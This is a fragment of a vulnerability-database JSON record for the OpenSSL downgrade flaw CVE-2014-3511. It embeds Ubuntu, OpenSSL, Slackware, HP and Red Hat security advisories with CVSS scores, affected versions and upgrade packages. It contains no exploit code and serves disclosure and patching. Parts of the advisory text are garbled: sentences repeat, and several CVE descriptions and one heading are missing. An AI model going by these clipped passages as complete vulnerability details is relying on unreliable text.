"NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2014-3511", "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3511", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3511", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3511" }, { "db": "NVD", "id": "CVE-2014-3511" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 1.0.1 before 1.0.1i allows man-in-the-middle attackers to force the use of TLS 1.0 by triggering ClientHello message fragmentation in communication between a client and server that both support later TLS versions, related to a \"protocol downgrade\" issue. OpenSSL is prone to security-bypass vulnerability. \nSuccessfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. \nOpenSSL 1.0.1 versions prior to 1.0.1i are vulnerable. ============================================================================\nUbuntu Security Notice USN-2308-1\nAugust 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nAdam Langley and Wan-Teh Chang discovered that OpenSSL incorrectly handled\ncertain DTLS packets. \n(CVE-2014-3506)\n\nAdam Langley discovered that OpenSSL incorrectly handled memory when\nprocessing DTLS fragments. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain\napplications, an attacker may use this issue to possibly gain access to\nsensitive information. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-5139)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.17\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nOpenSSL 0.9.8 users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 users should upgrade to 1.0.1i. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. \n\n\nCrash with SRP ciphersuite in Server Hello message (CVE-2014-5139)\n==================================================================\n\nThe issue affects OpenSSL clients and allows a malicious server to crash\nthe client with a null pointer dereference (read) by specifying an SRP\nciphersuite even though it was not properly negotiated with the client. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nRace condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)\n==============================================================\n\nIf a multithreaded client connects to a malicious server using a resumed session\nand the server sends an ec point format extension it could write up to 255 bytes\nto freed memory. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. \n\n\nDouble Free when processing DTLS packets (CVE-2014-3505)\n========================================================\n\nAn attacker can force an error condition which causes openssl to crash whilst\nprocessing DTLS packets due to memory being freed twice. This can be exploited\nthrough a Denial of Service attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory exhaustion (CVE-2014-3506)\n======================================\n\nAn attacker can force openssl to consume large amounts of memory whilst\nprocessing DTLS handshake messages. This can be exploited through a Denial of\nService attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory leak from zero-length fragments (CVE-2014-3507)\n===========================================================\n\nBy sending carefully crafted DTLS packets an attacker could cause openssl to\nleak memory. This can be exploited through a Denial of Service attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. A malicious server can crash the client with a null\npointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and\nsending carefully crafted handshake messages. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nOpenSSL 1.0.1 SSL/TLS users should upgrade to 1.0.1i. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n This update fixes several security issues:\n Double Free when processing DTLS packets (CVE-2014-3505)\n DTLS memory exhaustion (CVE-2014-3506)\n DTLS memory leak from zero-length fragments (CVE-2014-3507)\n Information leak in pretty printing functions (CVE-2014-3508)\n Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)\n OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n OpenSSL TLS protocol downgrade attack (CVE-2014-3511)\n SRP buffer overrun (CVE-2014-3512)\n Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)\n For more information, see:\n https://www.openssl.org/news/secadv_20140806.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04624296\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04624296\nVersion: 1\n\nHPSBMU03304 rev.1 - HP Insight Control server deployment on Linux and\nWindows, Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-04-01\nLast Updated: 2015-04-01\n\nPotential Security Impact: Remote disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH), HP Smart Update Manager (SUM), and HP Version\nControl Agent (VCA) which are components of HP Insight Control server\ndeployment. These vulnerabilities are related to the SSLv3 vulnerability\nknown as \"Padding Oracle on Downgraded Legacy Encryption\" or \"POODLE\". The\ncomponents of HP Insight Control server deployment could be exploited\nremotely to allow disclosure of information. \n\nHP Insight Control server deployment includes HP System Management Homepage\n(SMH), HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and\ndeploys them through the following jobs. This bulletin provides the\ninformation needed to update the vulnerable components in HP Insight Control\nserver deployment. \n\nInstall HP Management Agents for Windows x86/x64\nInstall HP Management Agents for RHEL 5 x64\nInstall HP Management Agents for RHEL 6 x64\nInstall HP Management Agents for SLES 10 x64\nInstall HP Management Agents for SLES 11 x64\nUpgrade Proliant Firmware\n\nReferences:\n\nCVE-2014-3508\nCVE-2014-3509\nCVE-2014-3511\nCVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\nCVE-2014-5139\nSSRT102004\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3509 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3511 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-3513 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2014-3568 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-5139 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following instructions to resolve this vulnerability. \n\nNote: For HP Insight deployment Control server v7.1.2, v7.2.0, v7.2.1 and\nv7.2.2, you must upgrade to v7.3.1 and follow the steps from 1 to 11\nmentioned below to resolve the vulnerability. \n\nDelete the files smh*.exe from Component Copy Location listed in the\nfollowing table, rows 1 and 2. \nDelete the files vca*.exe/vcaamd64-*.exe from Component Copy Location listed\nin the following table, rows 3 and 4. \nDelete the files hpsmh-7.*.rpm\" from Component Copy Location listed in row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nspecified in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-bd2042a1c7574aad90c4839efe\n smhamd64-cp023964.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n2\n http://www.hp.com/swpublishing/MTX-062078f1ae354b7e99c86c151c\n smhx86-cp023963.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n3\n http://www.hp.com/swpublishing/MTX-7b23e47d5d9b420b94bd1323eb\n vcax86 cp025295.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-2557aa7dc1654cf6b547c1a9e4\n vcaamd64-cp025296.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-5827037475e44abab586463723\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\n6\n http://www.hp.com/swpublishing/MTX-57ab6bb78b6e47a18718f44133\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\n7\n http://www.hp.com/swpublishing/MTX-34bcab41ac7e4db299e3f5f2f1\n smhx86-cp025274.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2003\n\n8\n http://www.hp.com/swpublishing/MTX-00eb9ac82e86449e8c3ba101bd\n smhamd64-cp025275.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2003\n\nDownload and extract the HP SUM component from\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p991570621/v99346\n\nCopy all content from extracted folder and paste at\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components\nInitiate Install HP Management Agents for SLES 11 x64 on the target running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on the target running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on the target running\nRHEL 6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on the target running\nRHEL 5 x64. \nInitiate Install HP Management Agents for Windows x86/x64 job on the target\nrunning Windows. \n\nHISTORY\nVersion:1 (rev.1) - 1 April 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: rhevm-spice-client security and bug fix update\nAdvisory ID: RHSA-2015:0197-01\nProduct: Red Hat Enterprise Virtualization\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0197.html\nIssue date: 2014-07-25\nUpdated on: 2015-02-11\nCVE Names: CVE-2014-3509 CVE-2014-3511 \n=====================================================================\n\n1. Summary:\n\nUpdated rhevm-spice-client packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Virtualization\nManager 3. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRHEV-M 3.5 - noarch\n\n3. Description:\n\nRed Hat Enterprise Virtualization Manager provides access to virtual\nmachines using SPICE. These SPICE client packages provide the SPICE client\nand usbclerk service for both Windows 32-bit operating systems and Windows\n64-bit operating systems. (CVE-2014-3509)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets. (CVE-2014-3511)\n\nThis update also fixes the following bugs:\n\n* Previously, various clipboard managers, operating on the client or on the\nguest, would occasionally lose synchronization, which resulted in clipboard\ndata loss and the SPICE console freezing. Now, spice-gtk have been patched,\nsuch that clipboard synchronization does not freeze the SPICE console\nanymore. (BZ#1083489)\n\n* Prior to this update, when a SPICE console was launched from the Red Hat\nEnterprise Virtualization User Portal with the \u0027Native Client\u0027 invocation\nmethod and \u0027Open in Full Screen\u0027 selected, the displays of the guest\nvirtual machine were not always configured to match the client displays. \nAfter this update, the SPICE console will show a full-screen guest display\nfor each client monitor. (BZ#1076243)\n\n* A difference in behavior between Linux and Windows clients caused an\nextra nul character to be sent when pasting text in a guest machine from a\nWindows client. This invisible character was visible in some Java\napplications. With this update, the extra nul character is removed from\ntext strings and no more extraneous character would appear. (BZ#1090122)\n\n* Previously, If the clipboard is of type image/bmp, and the data is of 0\nsize, GTK+ will crash. With this update, the data size is checked first,\nand GTK+ no longer crashes when clipboard is of type image/bmp, and the\ndata is of 0 size. (BZ#1090433)\n\n* Modifier-only key combinations cannot be registered by users as hotkeys\nso if a user tries to set a modifier-only key sequence (for example,\n\u0027ctrl+alt\u0027) as the hotkey for releasing the cursor, it will fail, and the\nuser will be able to release the cursor from the window. With this update,\nwhen a modifier-only hotkey is attempted to be registered, it will fall\nback to the default cursor-release sequence (which happens to be\n\u0027ctrl+alt\u0027). (BZ#985319)\n\n* Display configuration sometimes used outdated information about the\nposition of the remote-viewer windows in order to align and configure the\nguest displays. Occasionally, this caused the guest displays to became\nunexpectedly swapped when a window is resized. With this update,\nremote-viewer will always use the current window locations to align\ndisplays, rather than using a possibly outdated cached location\ninformation. (BZ#1018182)\n\nAll rhevm-spice-client users are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1018145 - --full-screen=auto-conf sometimes (but frequently) doesn\u0027t work correctly\n1018182 - primary monitor is switched if some screen gets bigger then current primary screen\n1076243 - [BUG] RHEV SPICE console not opening in full screen or detecting resolution by default\n1083489 - [SPICE][BUG] Spice session freezes randomly\n1090122 - Pasting into java apps inserts unprintable character\n1090433 - [GTK][BUG] win32: add more clipboard data checks to avoid crash\n1103366 - Rebase virt-viewer to 0.6.0\n1105650 - Fix windows productversion to fit -z releases\n1115445 - in About dialog, hyphen version-build dividing hyphen is missing\n1127498 - CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext\n1127504 - CVE-2014-3511 openssl: TLS protocol downgrade attack\n\n6. Package List:\n\nRHEV-M 3.5:\n\nSource:\nrhevm-spice-client-3.5-2.el6.src.rpm\n\nnoarch:\nrhevm-spice-client-x64-cab-3.5-2.el6.noarch.rpm\nrhevm-spice-client-x64-msi-3.5-2.el6.noarch.rpm\nrhevm-spice-client-x86-cab-3.5-2.el6.noarch.rpm\nrhevm-spice-client-x86-msi-3.5-2.el6.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3509\nhttps://access.redhat.com/security/cve/CVE-2014-3511\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More 